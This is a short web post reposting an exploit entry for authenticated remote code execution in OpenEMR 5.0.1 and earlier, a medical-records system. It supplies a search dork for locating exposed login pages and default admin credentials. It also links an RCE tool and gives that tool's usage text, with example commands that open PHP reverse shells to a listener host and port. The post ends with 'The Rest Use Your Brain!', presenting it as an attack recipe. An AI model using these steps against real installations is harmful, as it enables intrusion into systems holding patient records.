OpenEMR Authenticated Remote Code Execution
Januari 13, 2021
OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
# Exploit Author: Alexandre ZANNI
# Date: 2020-07-16
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
# References: https://www.exploit-db.com/exploits/48515
Dork:
Inurl:/openemr/interface/login/login.php?site=default
Default U/P:
admin
Pass
Tools RCE:
https://github.com/noraj/OpenEMR-RCE/
Usage:
#{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
#{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
#{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
#{__FILE__} -H | --help
Options:
-r <url>, --root-url <url>
Root URL (base path) including HTTP scheme, port and root folder
-s <filename>, --shell <filename>
Filename of the PHP reverse shell payload
-u <username>, --user <username>
Username of the admin
-p <password>, --password <password>
Password of the admin
-m <payload>, --payload <payload>
Metasploit PHP payload
-h <host>, --lhost <host>
Reverse shell local host
-t <port>, --lport <port>
Reverse shell local port
--debug Display arguments
-H, --help Show this screen
Examples:
#{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
#{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
#{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
The Rest Use Your Brain!